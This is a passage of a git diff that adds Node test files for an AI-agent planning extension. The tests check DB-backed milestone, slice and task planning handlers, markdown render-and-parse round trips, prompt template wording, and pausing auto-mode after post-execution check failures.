+    // (this is what gsd_milestone_generate_id does)
+    insertMilestone({ id: 'M001', status: 'queued' });
+
+    const before = getMilestone('M001');
+    assert.equal(before?.status, 'queued', 'pre-condition: milestone should start as queued');
+
+    // Now plan the milestone — status should be promoted to "active"
+    const result = await handlePlanMilestone(validParams(), base);
+    assert.ok(!('error' in result), `unexpected error: ${'error' in result ? result.error : ''}`);
+
+    const after = getMilestone('M001');
+    assert.equal(after?.status, 'active', 'milestone status should be promoted from queued to active');
+    assert.equal(after?.title, 'DB-backed planning', 'milestone title should be set');
+  } finally {
+    cleanup(base);
+  }
 });
diff --git a/src/resources/extensions/gsd/tests/plan-slice-prompt.test.ts b/src/resources/extensions/gsd/tests/plan-slice-prompt.test.ts
index 5c87c38a2..80f2bd5e9 100644
--- a/src/resources/extensions/gsd/tests/plan-slice-prompt.test.ts
+++ b/src/resources/extensions/gsd/tests/plan-slice-prompt.test.ts
@@ -54,6 +54,25 @@ test("plan-slice prompt: all variables substituted", () => {
   assert.ok(result.includes("S01"));
 });
 
+test("plan-slice prompt: DB-backed tool names survive template substitution", () => {
+  const result = loadPrompt("plan-slice", { ...BASE_VARS, commitInstruction: "Do not commit." });
+  assert.ok(result.includes("gsd_plan_slice"), "gsd_plan_slice should appear in rendered prompt");
+  assert.ok(result.includes("gsd_plan_task"), "gsd_plan_task should appear in rendered prompt");
+  assert.ok(result.includes("canonical write path"), "canonical write path language should survive substitution");
+});
+
+test("plan-slice prompt: footer references gsd_plan_slice tool, not direct write", () => {
+  const result = loadPrompt("plan-slice", { ...BASE_VARS, commitInstruction: "Do not commit." });
+  assert.ok(
+    result.includes("MUST call `gsd_plan_slice`"),
+    "footer should instruct calling gsd_plan_slice tool",
+  );
+  assert.ok(
+    !result.includes("MUST write the file"),
+    "footer should not instruct direct file write",
+  );
+});
+
 test("domain-work prompts use skillActivation placeholder", () => {
   const prompts = [
     "research-milestone",
@@ -167,6 +186,34 @@ test("research-milestone prompt substitutes skillActivation", () => {
   assert.ok(!result.includes("{{skillActivation}}"));
 });
 
+test("research-milestone prompt references gsd_summary_save, not direct write", () => {
+  const result = loadPrompt("research-milestone", {
+    workingDirectory: "/tmp/test-project",
+    milestoneId: "M001",
+    milestoneTitle: "Test Milestone",
+    milestonePath: ".gsd/milestones/M001",
+    contextPath: ".gsd/milestones/M001/M001-CONTEXT.md",
+    outputPath: "/tmp/test-project/.gsd/milestones/M001/M001-RESEARCH.md",
+    inlinedContext: "Context",
+    skillDiscoveryMode: "manual",
+    skillDiscoveryInstructions: " Discover skills manually.",
+    skillActivation: "Load research skills first.",
+  });
+
+  assert.ok(
+    result.includes("gsd_summary_save"),
+    "research-milestone should reference gsd_summary_save tool",
+  );
+  assert.ok(
+    result.includes('artifact_type: "RESEARCH"'),
+    "research-milestone should specify RESEARCH artifact type",
+  );
+  assert.ok(
+    !result.includes("MUST write the file"),
+    "research-milestone should not instruct direct file write",
+  );
+});
+
 test("research-slice prompt substitutes skillActivation", () => {
   const result = loadPrompt("research-slice", {
     workingDirectory: "/tmp/test-project",
diff --git a/src/resources/extensions/gsd/tests/plan-slice.test.ts b/src/resources/extensions/gsd/tests/plan-slice.test.ts
new file mode 100644
index 000000000..f40c9b11f
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/plan-slice.test.ts
@@ -0,0 +1,179 @@
+import test from 'node:test';
+import assert from 'node:assert/strict';
+import { mkdtempSync, mkdirSync, rmSync, readFileSync, existsSync, writeFileSync } from 'node:fs';
+import { join } from 'node:path';
+import { tmpdir } from 'node:os';
+
+import { openDatabase, closeDatabase, insertMilestone, insertSlice, getSlice, getSliceTasks, getTask } from '../gsd-db.ts';
+import { handlePlanSlice } from '../tools/plan-slice.ts';
+import { parsePlan } from '../parsers-legacy.ts';
+import { parseTaskPlanFile } from '../files.ts';
+
+function makeTmpBase(): string {
+  const base = mkdtempSync(join(tmpdir(), 'gsd-plan-slice-'));
+  mkdirSync(join(base, '.gsd', 'milestones', 'M001', 'slices', 'S02', 'tasks'), { recursive: true });
+  return base;
+}
+
+function cleanup(base: string): void {
+  try { closeDatabase(); } catch { /* noop */ }
+  try { rmSync(base, { recursive: true, force: true }); } catch { /* noop */ }
+}
+
+function seedParentSlice(): void {
+  insertMilestone({ id: 'M001', title: 'Milestone', status: 'active' });
+  insertSlice({ id: 'S02', milestoneId: 'M001', title: 'Planning slice', status: 'pending', demo: 'Rendered plans exist.' });
+}
+
+function validParams() {
+  return {
+    milestoneId: 'M001',
+    sliceId: 'S02',
+    goal: 'Persist slice planning through the DB.',
+    successCriteria: '- Slice plan renders from DB\n- Task plan files are regenerated',
+    proofLevel: 'integration',
+    integrationClosure: 'Planning handlers now write DB rows and render plan artifacts.',
+    observabilityImpact: '- Validation failures return structured errors\n- Cache invalidation is proven by parse-visible state updates',
+    tasks: [
+      {
+        taskId: 'T01',
+        title: 'Write slice handler',
+        description: 'Implement the slice planning handler.',
+        estimate: '45m',
+        files: ['src/resources/extensions/gsd/tools/plan-slice.ts'],
+        verify: 'node --test src/resources/extensions/gsd/tests/plan-slice.test.ts',
+        inputs: ['src/resources/extensions/gsd/tools/plan-milestone.ts'],
+        expectedOutput: ['src/resources/extensions/gsd/tools/plan-slice.ts'],
+        observabilityImpact: 'Tests exercise cache invalidation and render failure paths.',
+      },
+      {
+        taskId: 'T02',
+        title: 'Write task handler',
+        description: 'Implement the task planning handler.',
+        estimate: '30m',
+        files: ['src/resources/extensions/gsd/tools/plan-task.ts'],
+        verify: 'node --test src/resources/extensions/gsd/tests/plan-task.test.ts',
+        inputs: ['src/resources/extensions/gsd/tools/plan-task.ts'],
+        expectedOutput: ['src/resources/extensions/gsd/tests/plan-task.test.ts'],
+        observabilityImpact: 'Task-plan renders remain parse-compatible.',
+      },
+    ],
+  };
+}
+
+test('handlePlanSlice writes slice/task planning state and renders plan artifacts', async () => {
+  const base = makeTmpBase();
+  openDatabase(join(base, '.gsd', 'gsd.db'));
+
+  try {
+    seedParentSlice();
+
+    const result = await handlePlanSlice(validParams(), base);
+    assert.ok(!('error' in result), `unexpected error: ${'error' in result ? result.error : ''}`);
+
+    const slice = getSlice('M001', 'S02');
+    assert.ok(slice);
+    assert.equal(slice?.goal, 'Persist slice planning through the DB.');
+    assert.equal(slice?.proof_level, 'integration');
+
+    const tasks = getSliceTasks('M001', 'S02');
+    assert.equal(tasks.length, 2);
+    assert.equal(tasks[0]?.title, 'Write slice handler');
+    assert.equal(tasks[0]?.description, 'Implement the slice planning handler.');
+    assert.equal(tasks[1]?.estimate, '30m');
+
+    const planPath = join(base, '.gsd', 'milestones', 'M001', 'slices', 'S02', 'S02-PLAN.md');
+    assert.ok(existsSync(planPath), 'slice plan should be rendered to disk');
+    const parsedPlan = parsePlan(readFileSync(planPath, 'utf-8'));
+    assert.equal(parsedPlan.goal, 'Persist slice planning through the DB.');
+    assert.equal(parsedPlan.tasks.length, 2);
+    assert.equal(parsedPlan.tasks[0]?.id, 'T01');
+
+    const taskPlanPath = join(base, '.gsd', 'milestones', 'M001', 'slices', 'S02', 'tasks', 'T01-PLAN.md');
+    assert.ok(existsSync(taskPlanPath), 'task plan should be rendered to disk');
+    const taskPlan = parseTaskPlanFile(readFileSync(taskPlanPath, 'utf-8'));
+    assert.deepEqual(taskPlan.frontmatter.skills_used, []);
+  } finally {
+    cleanup(base);
+  }
+});
+
+test('handlePlanSlice rejects invalid payloads', async () => {
+  const base = makeTmpBase();
+  openDatabase(join(base, '.gsd', 'gsd.db'));
+
+  try {
+    seedParentSlice();
+    const result = await handlePlanSlice({ ...validParams(), tasks: [] }, base);
+    assert.ok('error' in result);
+    assert.match(result.error, /validation failed: tasks must be a non-empty array/);
+  } finally {
+    cleanup(base);
+  }
+});
+
+test('handlePlanSlice rejects missing parent slice', async () => {
+  const base = makeTmpBase();
+  openDatabase(join(base, '.gsd', 'gsd.db'));
+
+  try {
+    insertMilestone({ id: 'M001', title: 'Milestone', status: 'active' });
+    const result = await handlePlanSlice(validParams(), base);
+    assert.ok('error' in result);
+    assert.match(result.error, /missing parent slice: M001\/S02/);
+  } finally {
+    cleanup(base);
+  }
+});
+
+test('handlePlanSlice surfaces render failures without changing parse-visible task-plan state for the failing task', async () => {
+  const base = makeTmpBase();
+  openDatabase(join(base, '.gsd', 'gsd.db'));
+
+  try {
+    seedParentSlice();
+    const failingTaskPlanPath = join(base, '.gsd', 'milestones', 'M001', 'slices', 'S02', 'tasks', 'T01-PLAN.md');
+    writeFileSync(failingTaskPlanPath, '---\nestimated_steps: 1\nestimated_files: 1\nskills_used: []\n---\n\n# T01: Cached task\n', 'utf-8');
+    rmSync(failingTaskPlanPath, { force: true });
+    mkdirSync(failingTaskPlanPath, { recursive: true });
+
+    const result = await handlePlanSlice(validParams(), base);
+    assert.ok('error' in result);
+    assert.match(result.error, /render failed:/);
+
+    assert.ok(existsSync(failingTaskPlanPath), 'failing task plan path should remain the blocking directory');
+    assert.equal(getTask('M001', 'S02', 'T01')?.description, 'Implement the slice planning handler.');
+  } finally {
+    cleanup(base);
+  }
+});
+
+test('handlePlanSlice reruns idempotently and refreshes parse-visible state', async () => {
+  const base = makeTmpBase();
+  openDatabase(join(base, '.gsd', 'gsd.db'));
+
+  try {
+    seedParentSlice();
+    writeFileSync(join(base, '.gsd', 'milestones', 'M001', 'slices', 'S02', 'S02-PLAN.md'), '# S02: Cached\n\n**Goal:** old value\n\n## Tasks\n\n- [ ] **T01: Cached task**\n', 'utf-8');
+
+    const first = await handlePlanSlice(validParams(), base);
+    assert.ok(!('error' in first));
+
+    const second = await handlePlanSlice({
+      ...validParams(),
+      goal: 'Updated goal from rerun.',
+      tasks: [
+        { ...validParams().tasks[0], description: 'Updated slice handler description.' },
+        validParams().tasks[1],
+      ],
+    }, base);
+    assert.ok(!('error' in second));
+
+    const parsedAfter = parsePlan(readFileSync(join(base, '.gsd', 'milestones', 'M001', 'slices', 'S02', 'S02-PLAN.md'), 'utf-8'));
+    assert.equal(parsedAfter.goal, 'Updated goal from rerun.');
+    const task = getTask('M001', 'S02', 'T01');
+    assert.equal(task?.description, 'Updated slice handler description.');
+  } finally {
+    cleanup(base);
+  }
+});
diff --git a/src/resources/extensions/gsd/tests/plan-task.test.ts b/src/resources/extensions/gsd/tests/plan-task.test.ts
new file mode 100644
index 000000000..d09532b20
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/plan-task.test.ts
@@ -0,0 +1,145 @@
+import test from 'node:test';
+import assert from 'node:assert/strict';
+import { mkdtempSync, mkdirSync, rmSync, readFileSync, existsSync, writeFileSync } from 'node:fs';
+import { join } from 'node:path';
+import { tmpdir } from 'node:os';
+
+import { openDatabase, closeDatabase, insertMilestone, insertSlice, insertTask, getTask } from '../gsd-db.ts';
+import { handlePlanTask } from '../tools/plan-task.ts';
+import { parseTaskPlanFile } from '../files.ts';
+
+function makeTmpBase(): string {
+  const base = mkdtempSync(join(tmpdir(), 'gsd-plan-task-'));
+  mkdirSync(join(base, '.gsd', 'milestones', 'M001', 'slices', 'S02', 'tasks'), { recursive: true });
+  return base;
+}
+
+function cleanup(base: string): void {
+  try { closeDatabase(); } catch { /* noop */ }
+  try { rmSync(base, { recursive: true, force: true }); } catch { /* noop */ }
+}
+
+function seedParent(): void {
+  insertMilestone({ id: 'M001', title: 'Milestone', status: 'active' });
+  insertSlice({ id: 'S02', milestoneId: 'M001', title: 'Planning slice', status: 'pending', demo: 'Rendered plans exist.' });
+}
+
+function validParams() {
+  return {
+    milestoneId: 'M001',
+    sliceId: 'S02',
+    taskId: 'T02',
+    title: 'Write task handler',
+    description: 'Implement the DB-backed task planning handler.',
+    estimate: '30m',
+    files: ['src/resources/extensions/gsd/tools/plan-task.ts'],
+    verify: 'node --test src/resources/extensions/gsd/tests/plan-task.test.ts',
+    inputs: ['src/resources/extensions/gsd/tools/plan-task.ts'],
+    expectedOutput: ['src/resources/extensions/gsd/tests/plan-task.test.ts'],
+    observabilityImpact: 'Tests exercise validation, render failure, and cache refresh behavior.',
+  };
+}
+
+test('handlePlanTask writes planning state and renders task plan', async () => {
+  const base = makeTmpBase();
+  openDatabase(join(base, '.gsd', 'gsd.db'));
+
+  try {
+    seedParent();
+    const result = await handlePlanTask(validParams(), base);
+    assert.ok(!('error' in result), `unexpected error: ${'error' in result ? result.error : ''}`);
+
+    const task = getTask('M001', 'S02', 'T02');
+    assert.ok(task);
+    assert.equal(task?.title, 'Write task handler');
+    assert.equal(task?.description, 'Implement the DB-backed task planning handler.');
+    assert.equal(task?.estimate, '30m');
+
+    const taskPlanPath = join(base, '.gsd', 'milestones', 'M001', 'slices', 'S02', 'tasks', 'T02-PLAN.md');
+    assert.ok(existsSync(taskPlanPath), 'task plan should be rendered to disk');
+    const taskPlan = parseTaskPlanFile(readFileSync(taskPlanPath, 'utf-8'));
+    assert.equal(taskPlan.frontmatter.estimated_files, 1);
+    assert.deepEqual(taskPlan.frontmatter.skills_used, []);
+  } finally {
+    cleanup(base);
+  }
+});
+
+test('handlePlanTask rejects invalid payloads', async () => {
+  const base = makeTmpBase();
+  openDatabase(join(base, '.gsd', 'gsd.db'));
+
+  try {
+    seedParent();
+    const result = await handlePlanTask({ ...validParams(), files: [''] }, base);
+    assert.ok('error' in result);
+    assert.match(result.error, /validation failed: files must contain only non-empty strings/);
+  } finally {
+    cleanup(base);
+  }
+});
+
+test('handlePlanTask rejects missing parent slice', async () => {
+  const base = makeTmpBase();
+  openDatabase(join(base, '.gsd', 'gsd.db'));
+
+  try {
+    insertMilestone({ id: 'M001', title: 'Milestone', status: 'active' });
+    const result = await handlePlanTask(validParams(), base);
+    assert.ok('error' in result);
+    assert.match(result.error, /missing parent slice: M001\/S02/);
+  } finally {
+    cleanup(base);
+  }
+});
+
+test('handlePlanTask surfaces render failures without changing parse-visible task plan state', async () => {
+  const base = makeTmpBase();
+  openDatabase(join(base, '.gsd', 'gsd.db'));
+
+  try {
+    seedParent();
+    insertTask({ id: 'T02', sliceId: 'S02', milestoneId: 'M001', title: 'Cached task', status: 'pending' });
+    const taskPlanPath = join(base, '.gsd', 'milestones', 'M001', 'slices', 'S02', 'tasks', 'T02-PLAN.md');
+    writeFileSync(taskPlanPath, '---\nestimated_steps: 1\nestimated_files: 1\nskills_used: []\n---\n\n# T02: Cached task\n', 'utf-8');
+    rmSync(taskPlanPath, { force: true });
+    mkdirSync(taskPlanPath, { recursive: true });
+
+    const result = await handlePlanTask(validParams(), base);
+    assert.ok('error' in result);
+    assert.match(result.error, /render failed:/);
+  } finally {
+    cleanup(base);
+  }
+});
+
+test('handlePlanTask reruns idempotently and refreshes parse-visible state', async () => {
+  const base = makeTmpBase();
+  openDatabase(join(base, '.gsd', 'gsd.db'));
+
+  try {
+    seedParent();
+    const taskPlanPath = join(base, '.gsd', 'milestones', 'M001', 'slices', 'S02', 'tasks', 'T02-PLAN.md');
+    writeFileSync(taskPlanPath, '---\nestimated_steps: 1\nestimated_files: 1\nskills_used: []\n---\n\n# T02: Cached task\n', 'utf-8');
+
+    const first = await handlePlanTask(validParams(), base);
+    assert.ok(!('error' in first));
+
+    const second = await handlePlanTask({
+      ...validParams(),
+      description: 'Updated task handler description.',
+      estimate: '1h',
+    }, base);
+    assert.ok(!('error' in second));
+
+    const task = getTask('M001', 'S02', 'T02');
+    assert.equal(task?.description, 'Updated task handler description.');
+    assert.equal(task?.estimate, '1h');
+
+    const parsed = parseTaskPlanFile(readFileSync(taskPlanPath, 'utf-8'));
+    assert.equal(parsed.frontmatter.estimated_steps, 1);
+    assert.match(readFileSync(taskPlanPath, 'utf-8'), /Updated task handler description\./);
+  } finally {
+    cleanup(base);
+  }
+});
diff --git a/src/resources/extensions/gsd/tests/planning-crossval.test.ts b/src/resources/extensions/gsd/tests/planning-crossval.test.ts
new file mode 100644
index 000000000..1fe06da00
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/planning-crossval.test.ts
@@ -0,0 +1,305 @@
+// planning-crossval.test.ts — Cross-validation: DB→render→parse round-trip parity
+// Proves R014: DB state matches rendered-then-parsed state during the transition window.
+// Each test seeds planning data into DB via insert functions, renders markdown via
+// renderers, parses back via existing parsers, and asserts field-by-field parity.
+
+import { mkdtempSync, mkdirSync, readFileSync, rmSync } from 'node:fs';
+import { join } from 'node:path';
+import { tmpdir } from 'node:os';
+
+import {
+  openDatabase,
+  closeDatabase,
+  insertMilestone,
+  insertSlice,
+  insertTask,
+  getMilestoneSlices,
+  getSliceTasks,
+} from '../gsd-db.ts';
+import {
+  renderRoadmapFromDb,
+  renderPlanFromDb,
+} from '../markdown-renderer.ts';
+import { parseRoadmapSlices } from '../roadmap-slices.ts';
+import { parsePlan } from '../parsers-legacy.ts';
+import { createTestContext } from './test-helpers.ts';
+
+const { assertEq, assertTrue, report } = createTestContext();
+
+// ─── Fixture Helpers ───────────────────────────────────────────────────────
+
+function createFixtureBase(): string {
+  const base = mkdtempSync(join(tmpdir(), 'gsd-planning-crossval-'));
+  mkdirSync(join(base, '.gsd', 'milestones'), { recursive: true });
+  return base;
+}
+
+/** Scaffold the minimal directory structure the renderers need on disk. */
+function scaffoldDirs(base: string, milestoneId: string, sliceIds: string[]): void {
+  mkdirSync(join(base, '.gsd', 'milestones', milestoneId), { recursive: true });
+  for (const sid of sliceIds) {
+    mkdirSync(join(base, '.gsd', 'milestones', milestoneId, 'slices', sid, 'tasks'), { recursive: true });
+  }
+}
+
+function cleanup(base: string): void {
+  rmSync(base, { recursive: true, force: true });
+}
+
+// ═══════════════════════════════════════════════════════════════════════════
+// Test 1: ROADMAP DB→render→parse round-trip parity
+// ═══════════════════════════════════════════════════════════════════════════
+
+console.log('\n=== planning-crossval Test 1: ROADMAP round-trip parity ===');
+{
+  const base = createFixtureBase();
+  const dbPath = join(base, '.gsd', 'gsd.db');
+  openDatabase(dbPath);
+  try {
+    scaffoldDirs(base, 'M001', ['S01', 'S02', 'S03', 'S04']);
+
+    // Insert milestone
+    insertMilestone({
+      id: 'M001',
+      title: 'Crossval Test Project',
+      status: 'active',
+      planning: { vision: 'Test round-trip parity.' },
+    });
+
+    // Insert 4 slices with varied status, depends, risk, and demo
+    const dbSlices = [
+      { id: 'S01', title: 'Foundation', status: 'complete', risk: 'low', depends: [] as string[], demo: 'Foundation laid.', sequence: 1 },
+      { id: 'S02', title: 'Core Logic', status: 'complete', risk: 'medium', depends: ['S01'], demo: 'Core working.', sequence: 2 },
+      { id: 'S03', title: 'Integration', status: 'pending', risk: 'high', depends: ['S01', 'S02'], demo: 'Integrated.', sequence: 3 },
+      { id: 'S04', title: 'Polish', status: 'pending', risk: 'low', depends: ['S03'], demo: 'Polished.', sequence: 4 },
+    ];
+
+    for (const s of dbSlices) {
+      insertSlice({
+        id: s.id,
+        milestoneId: 'M001',
+        title: s.title,
+        status: s.status,
+        risk: s.risk,
+        depends: s.depends,
+        demo: s.demo,
+        sequence: s.sequence,
+      });
+    }
+
+    // Render ROADMAP.md from DB
+    const rendered = await renderRoadmapFromDb(base, 'M001');
+    const content = readFileSync(rendered.roadmapPath, 'utf-8');
+
+    // Parse back
+    const parsedSlices = parseRoadmapSlices(content);
+
+    // Assert slice count
+    assertEq(parsedSlices.length, dbSlices.length, 'T1: slice count matches');
+
+    // Assert field parity for each slice
+    for (let i = 0; i < dbSlices.length; i++) {
+      const db = dbSlices[i];
+      const parsed = parsedSlices[i];
+      assertEq(parsed.id, db.id, `T1: slice[${i}].id`);
+      assertEq(parsed.title, db.title, `T1: slice[${i}].title`);
+      assertEq(parsed.done, db.status === 'complete', `T1: slice[${i}].done matches status`);
+      assertEq(parsed.risk, db.risk, `T1: slice[${i}].risk`);
+      assertEq(JSON.stringify(parsed.depends), JSON.stringify(db.depends), `T1: slice[${i}].depends`);
+    }
+  } finally {
+    closeDatabase();
+    cleanup(base);
+  }
+}
+
+// ═══════════════════════════════════════════════════════════════════════════
+// Test 2: PLAN DB→render→parse round-trip parity
+// ═══════════════════════════════════════════════════════════════════════════
+
+console.log('\n=== planning-crossval Test 2: PLAN round-trip parity ===');
+{
+  const base = createFixtureBase();
+  const dbPath = join(base, '.gsd', 'gsd.db');
+  openDatabase(dbPath);
+  try {
+    scaffoldDirs(base, 'M001', ['S01']);
+
+    insertMilestone({
+      id: 'M001',
+      title: 'Plan Crossval',
+      status: 'active',
+      planning: { vision: 'Test plan round-trip.' },
+    });
+
+    insertSlice({
+      id: 'S01',
+      milestoneId: 'M001',
+      title: 'Core Slice',
+      status: 'pending',
+      demo: 'Core working.',
+      planning: {
+        goal: 'Build the core feature.',
+        successCriteria: '- Tests pass\n- Coverage above 80%',
+      },
+    });
+
+    // Insert 3 tasks with planning fields populated
+    const dbTasks = [
+      {
+        id: 'T01',
+        title: 'Setup types',
+        status: 'complete',
+        description: 'Define TypeScript interfaces for all domain types.',
+        files: ['src/types.ts', 'src/interfaces.ts'],
+        verify: 'node --test types.test.ts',
+        estimate: '30m',
+        sequence: 1,
+      },
+      {
+        id: 'T02',
+        title: 'Implement logic',
+        status: 'pending',
+        description: 'Build the core business logic module.',
+        files: ['src/logic.ts'],
+        verify: 'node --test logic.test.ts',
+        estimate: '1h',
+        sequence: 2,
+      },
+      {
+        id: 'T03',
+        title: 'Write tests',
+        status: 'pending',
+        description: 'Create comprehensive test coverage.',
+        files: ['src/tests/core.test.ts', 'src/tests/edge.test.ts'],
+        verify: 'npm test',
+        estimate: '45m',
+        sequence: 3,
+      },
+    ];
+
+    for (const t of dbTasks) {
+      insertTask({
+        id: t.id,
+        sliceId: 'S01',
+        milestoneId: 'M001',
+        title: t.title,
+        status: t.status,
+        sequence: t.sequence,
+        planning: {
+          description: t.description,
+          files: t.files,
+          verify: t.verify,
+          estimate: t.estimate,
+        },
+      });
+    }
+
+    // Render PLAN from DB
+    const rendered = await renderPlanFromDb(base, 'M001', 'S01');
+    const content = readFileSync(rendered.planPath, 'utf-8');
+
+    // Parse back
+    const parsedPlan = parsePlan(content);
+
+    // Assert task count
+    assertEq(parsedPlan.tasks.length, 3, 'T2: task count matches');
+
+    // Assert field parity for each task
+    for (let i = 0; i < dbTasks.length; i++) {
+      const db = dbTasks[i];
+      const parsed = parsedPlan.tasks[i];
+      assertEq(parsed.id, db.id, `T2: task[${i}].id`);
+      assertEq(parsed.title, db.title, `T2: task[${i}].title`);
+      assertEq(parsed.verify, db.verify, `T2: task[${i}].verify`);
+      assertEq(parsed.done, db.status === 'complete', `T2: task[${i}].done matches status`);
+    }
+
+    // Assert filesLikelyTouched contains all files from all tasks
+    const allFiles = dbTasks.flatMap(t => t.files);
+    for (const file of allFiles) {
+      assertTrue(
+        parsedPlan.filesLikelyTouched.includes(file),
+        `T2: filesLikelyTouched contains ${file}`,
+      );
+    }
+
+    // Assert task order matches sequence ordering (T01, T02, T03)
+    assertEq(parsedPlan.tasks[0].id, 'T01', 'T2: first task is T01 (sequence 1)');
+    assertEq(parsedPlan.tasks[1].id, 'T02', 'T2: second task is T02 (sequence 2)');
+    assertEq(parsedPlan.tasks[2].id, 'T03', 'T2: third task is T03 (sequence 3)');
+
+    // Assert task files preserved
+    assertEq(
+      JSON.stringify(parsedPlan.tasks[0].files),
+      JSON.stringify(dbTasks[0].files),
+      'T2: task[0].files match DB',
+    );
+  } finally {
+    closeDatabase();
+    cleanup(base);
+  }
+}
+
+// ═══════════════════════════════════════════════════════════════════════════
+// Test 3: Sequence ordering parity — non-sequential insertion order
+// ═══════════════════════════════════════════════════════════════════════════
+
+console.log('\n=== planning-crossval Test 3: Sequence ordering parity ===');
+{
+  const base = createFixtureBase();
+  const dbPath = join(base, '.gsd', 'gsd.db');
+  openDatabase(dbPath);
+  try {
+    scaffoldDirs(base, 'M001', ['S01', 'S02', 'S03', 'S04']);
+
+    insertMilestone({
+      id: 'M001',
+      title: 'Sequence Test',
+      status: 'active',
+      planning: { vision: 'Test sequence ordering.' },
+    });
+
+    // Insert slices in scrambled order with explicit sequence values
+    // Insertion order: S03(seq=3), S01(seq=1), S04(seq=4), S02(seq=2)
+    // Expected render/parse order: S01, S02, S03, S04 (by sequence)
+    insertSlice({ id: 'S03', milestoneId: 'M001', title: 'Third', status: 'pending', risk: 'low', demo: 'Third done.', sequence: 3 });
+    insertSlice({ id: 'S01', milestoneId: 'M001', title: 'First', status: 'complete', risk: 'low', demo: 'First done.', sequence: 1 });
+    insertSlice({ id: 'S04', milestoneId: 'M001', title: 'Fourth', status: 'pending', risk: 'high', demo: 'Fourth done.', sequence: 4 });
+    insertSlice({ id: 'S02', milestoneId: 'M001', title: 'Second', status: 'complete', risk: 'medium', demo: 'Second done.', sequence: 2 });
+
+    // Verify DB query returns sequence-ordered results
+    const dbSlices = getMilestoneSlices('M001');
+    assertEq(dbSlices.length, 4, 'T3: DB returns 4 slices');
+    assertEq(dbSlices[0].id, 'S01', 'T3: DB first slice is S01 (sequence 1)');
+    assertEq(dbSlices[1].id, 'S02', 'T3: DB second slice is S02 (sequence 2)');
+    assertEq(dbSlices[2].id, 'S03', 'T3: DB third slice is S03 (sequence 3)');
+    assertEq(dbSlices[3].id, 'S04', 'T3: DB fourth slice is S04 (sequence 4)');
+
+    // Render ROADMAP from DB — should produce slices in sequence order
+    const rendered = await renderRoadmapFromDb(base, 'M001');
+    const content = readFileSync(rendered.roadmapPath, 'utf-8');
+
+    // Parse back
+    const parsedSlices = parseRoadmapSlices(content);
+
+    // Assert parsed order matches sequence order, NOT insertion order
+    assertEq(parsedSlices.length, 4, 'T3: parsed 4 slices');
+    assertEq(parsedSlices[0].id, 'S01', 'T3: parsed first slice is S01 (sequence 1)');
+    assertEq(parsedSlices[1].id, 'S02', 'T3: parsed second slice is S02 (sequence 2)');
+    assertEq(parsedSlices[2].id, 'S03', 'T3: parsed third slice is S03 (sequence 3)');
+    assertEq(parsedSlices[3].id, 'S04', 'T3: parsed fourth slice is S04 (sequence 4)');
+
+    // Assert full parity through DB→render→parse round-trip
+    for (let i = 0; i < 4; i++) {
+      assertEq(parsedSlices[i].id, dbSlices[i].id, `T3: round-trip slice[${i}].id`);
+      assertEq(parsedSlices[i].done, dbSlices[i].status === 'complete', `T3: round-trip slice[${i}].done`);
+      assertEq(parsedSlices[i].title, dbSlices[i].title, `T3: round-trip slice[${i}].title`);
+    }
+  } finally {
+    closeDatabase();
+    cleanup(base);
+  }
+}
+
+report();
diff --git a/src/resources/extensions/gsd/tests/post-exec-retry-bypass.test.ts b/src/resources/extensions/gsd/tests/post-exec-retry-bypass.test.ts
new file mode 100644
index 000000000..60de86f21
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/post-exec-retry-bypass.test.ts
@@ -0,0 +1,312 @@
+/**
+ * post-exec-retry-bypass.test.ts — Tests for post-execution blocking failure retry bypass.
+ *
+ * Verifies that when post-execution checks fail (postExecBlockingFailure is true),
+ * the retry system is bypassed and auto-mode pauses immediately. Post-execution
+ * failures are cross-task consistency issues — retrying the same task won't fix them.
+ */
+
+import { describe, test, mock, beforeEach, afterEach } from "node:test";
+import assert from "node:assert/strict";
+import { tmpdir } from "node:os";
+import { mkdirSync, writeFileSync, rmSync, existsSync } from "node:fs";
+import { join } from "node:path";
+
+import { runPostUnitVerification, type VerificationContext } from "../auto-verification.ts";
+import { AutoSession } from "../auto/session.ts";
+import { openDatabase, closeDatabase, insertMilestone, insertSlice, insertTask } from "../gsd-db.ts";
+import { invalidateAllCaches } from "../cache.ts";
+import { _clearGsdRootCache } from "../paths.ts";
+
+// ─── Test Fixtures ───────────────────────────────────────────────────────────
+
+let tempDir: string;
+let dbPath: string;
+let originalCwd: string;
+
+function makeMockCtx() {
+  return {
+    ui: {
+      notify: mock.fn(),
+      setStatus: () => {},
+      setWidget: () => {},
+      setFooter: () => {},
+    },
+    model: { id: "test-model" },
+  } as any;
+}
+
+function makeMockPi() {
+  return {
+    sendMessage: mock.fn(),
+    setModel: mock.fn(async () => true),
+  } as any;
+}
+
+function makeMockSession(basePath: string, currentUnit?: { type: string; id: string }): AutoSession {
+  const s = new AutoSession();
+  s.basePath = basePath;
+  s.active = true;
+  // verificationRetryCount is readonly but initialized as an empty Map in AutoSession
+  s.pendingVerificationRetry = null;
+  if (currentUnit) {
+    s.currentUnit = {
+      type: currentUnit.type,
+      id: currentUnit.id,
+      startedAt: Date.now(),
+    };
+  }
+  return s;
+}
+
+function setupTestEnvironment(): void {
+  originalCwd = process.cwd();
+  tempDir = join(tmpdir(), `post-exec-retry-test-${Date.now()}-${Math.random().toString(36).slice(2)}`);
+  mkdirSync(tempDir, { recursive: true });
+
+  const gsdDir = join(tempDir, ".gsd");
+  mkdirSync(gsdDir, { recursive: true });
+
+  const milestonesDir = join(gsdDir, "milestones", "M001", "slices", "S01", "tasks");
+  mkdirSync(milestonesDir, { recursive: true });
+
+  process.chdir(tempDir);
+  _clearGsdRootCache();
+
+  dbPath = join(gsdDir, "gsd.db");
+  openDatabase(dbPath);
+}
+
+function cleanupTestEnvironment(): void {
+  try {
+    process.chdir(originalCwd);
+  } catch {
+    // Ignore
+  }
+  try {
+    closeDatabase();
+  } catch {
+    // Ignore
+  }
+  try {
+    rmSync(tempDir, { recursive: true, force: true });
+  } catch {
+    // Ignore
+  }
+}
+
+function writePreferences(prefs: Record<string, unknown>): void {
+  const yamlLines = Object.entries(prefs).map(([k, v]) => `${k}: ${JSON.stringify(v)}`);
+  const prefsContent = `---
+${yamlLines.join("\n")}
+---
+
+# GSD Preferences
+`;
+  writeFileSync(join(tempDir, ".gsd", "PREFERENCES.md"), prefsContent);
+  invalidateAllCaches();
+  _clearGsdRootCache();
+}
+
+/**
+ * Create a task in DB that will pass basic verification but allows us to test the flow.
+ */
+function createBasicTask(): void {
+  insertMilestone({ id: "M001" });
+  insertSlice({
+    id: "S01",
